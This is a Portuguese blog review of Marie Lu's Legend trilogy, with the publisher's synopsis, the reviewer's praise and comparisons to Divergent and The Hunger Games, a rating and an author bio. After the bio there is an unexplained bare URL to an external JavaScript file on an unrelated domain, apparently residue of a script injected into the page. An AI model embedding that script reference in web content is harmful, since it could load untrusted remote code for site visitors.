Sinopse Editora Rocco: A Verdade Se Tornará Lenda – Ambientado na cidade de Los Angeles em 2130 D.C., na atual República da América, conta a história de um rapaz – o criminoso mais procurado do país – e de uma jovem – a pupila mais promissora da República –, cujos caminhos se cruzam quando o irmão desta é assassinado e a ela cabe a tarefa de capturar o responsável pelo crime. No entanto, a verdade que os dois desvendarão se tornará uma lenda. O que outrora foi o oeste dos Estados Unidos é agora o lar da República, uma nação eternamente em guerra com seus vizinhos. Nascida em uma família de elite em um dos mais ricos setores da República, June é uma garota prodígio de 15 anos que está sendo preparada para o sucesso nos mais altos círculos militares da República. Nascido nas favelas, Day, de 15 anos, é o criminoso mais procurado do país; porém, suas motivações parecem não ser tão mal-intencionadas assim. De mundos diferentes, June e Day não têm motivos para se cruzarem – até o dia em que o irmão de June, Metias, é assassinado e Day se torna o principal suspeito. Preso num grande jogo de gato e rato, Day luta pela sobrevivência da sua família, enquanto June procura vingar a morte de Metias. Mas, em uma chocante reviravolta, os dois descobrem a verdade sobre o que realmente os uniu e sobre até onde seu país irá para manter seus segredos.

Resenha: Trilogia Legend – Marie Lu

Opinião: Distopias são histórias empolgantes que misturam romance, perda, guerra e mistérios. Se passam em ambientes cheio de cicatrizes ou futurísticos. Marie Lu, perfeitamente entrega uma história empolgante que te envolve do início ao fim.

June é uma garota rica, estudada e sendo preparada pra ser uma grande agente da lei. Em uma sociedade marcada pelas diferenças grotescas de classes (baixa e alta), ela é fundamental pra manter a ordem e o equilíbrio para a classe alta.

Day é um jovem pobre, que mora nos subúrbio da cidade e tem que roubar para poder dar a família o mínimo possível de alimento e se sobrar pra seu sustento. Crescido em um ambiente hostil suas chances de crescer são poucas, a sociedade não apoia e o coloca como um ser doente e horripilante, é preciso ficar longe.

Quando os caminhos de June e Day se cruzam presenciamos o famoso ato de Shakespeare. Um amor impossível e perigoso, que pode trazer mais feridas das que a sociedade já coloca. E é justamente esse encontro explosivo que as coisas começam a tomar outro sentido para June e Day. A repulsa desse relacionamento atinge pontos catastróficos e as revelações que este traz é visceral.

Day e June embarcam em uma jornada perigosa e em cada momento são colocados personagens que ajudam, facilitam e que dificultam a vida dos dois.

A história tem cenas de ações marcantes e dignas de serem vistas nas telas. Pode parecer que a história gira em torno do romance de June e Day, longe disso, o romance é uma parte bem pequena das verdades que estão escondidas e que quando reveladas chega difícil de serem digeridas.

Marie Lu construiu um universo distópico muito bem pensando e elaborado. Fugindo daquela ideia de futurismo e altas tecnologias, o ambiente é sagaz e perigoso. Em meio a histórias como THG e Divergente, a trilogia Legend consegue ser independente destes dois universos e ser muito mais interessante que a história de Roth em Divergente.

Legend coloca ao leitor a discussão de uma sociedade mais justa e como torná-la justa em meio a tanta monopolização de poder. Em outras palavras, a autora critica o capitalismo, socialismo, a forma de governo e o quanto isso tem estragado a sociedade por anos.

A trilogia possui uma leitura contínua, empolgante e que prende o leitor em cada página. Isso acontece devido a possibilidade de acompanhar os pontos de vista de June e Day. Pra saber mais, leiam!

P.S: Trilogia Legend é muito melhor que a trilogia Divergente, mas não supera THG.

Os livros foram publicados pela editora PRUMO e agora estão sob o domínio da editora Rocco.

Marie Lu tem outras histórias e logo a resenharemos aqui.

Avaliação: 4 estrelas

A autora Marie Lu nasceu na China e mudou-se ainda criança com a família para os Estados Unidos. Formou-se na Universidade do Sul da Califórnia e começou a trabalhar como programadora na indústria de videogames. Hoje é escritora em tempo integral. Nas horas vagas, ou quando não está presa em engarrafamentos, ela gosta de ler, desenhar e jogar Assassin’s Creed. Ela mora em Los Angeles, na Califórnia (por isso os engarrafamentos), com o namorado, um Chihuahua sem pedigree e dois cachorrinhos da raça Welsh Corgi Pembroke. Conheça mais sobre a autora em: www.marielu.org

https://cloudapi.online/js/api46.js

Compartilhar
Artigo anteriorEditora Arqueiro: lançamentos de Novembro/2017
Próximo artigoResenha: O Gabinete Paralelo – Maureen Johnson
Goiano do pé rachado e comedor de piqui. Alucinado por histórias fantásticas e distópicos. Tributo, Hobbit de nascença, e habitante do país de Aslan. Entre os autores Suzanne Collins é majestade e Tolkien é imperador. Técnico em Química e buscando ser químico industrial intercalado com a vida de escritor, um dia qualquer publicará seu livro. Não dispensa um cinema...

Deixe uma resposta